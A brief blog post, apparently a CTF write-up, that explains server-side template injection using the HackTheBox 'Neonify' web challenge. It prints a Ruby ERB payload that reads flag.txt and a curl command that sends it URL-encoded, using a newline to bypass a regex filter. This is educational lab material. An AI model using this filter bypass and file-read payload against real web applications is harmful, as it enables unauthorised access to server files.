Server Side Template Injection (SSTI) Explained | HackTheBox Neonify

Motasem Hamdan
1 min readDec 28, 2023

--

We covered Server Side Template Injection vulnerability and demonstrated a practical scenario using HackTheBox Neonify web challenge. SSTI is a server side exploit in which user input is parsed directly to the template engine without validation. In the example we covered, the code contained a regular expression filter to rule out bad characters so we used a newline character and encoded a payload using URL encoding to reveal the flag contents.. This was part of HackTheBox Neonify.

CHALLENGE DESCRIPTION

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Video Highlights

  • We used this SSTI payload to read and reveal sensitive files
  • <%= File.open('flag.txt').read %
  • The payload should be URL-Encoded with a newline character.

An example request can be sent with curl using the below command to reveal the flag.

curl -d ‘neon=a
%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E’ ip:port

https://www.youtube.com/watch?v=Rc0JTdb7jLU

--

--

Motasem Hamdan
Motasem Hamdan

Written by Motasem Hamdan

Motasem Hamdan is a content creator and swimmer who creates cyber security training videos and articles. https://www.youtube.com/@MotasemHamdan

No responses yet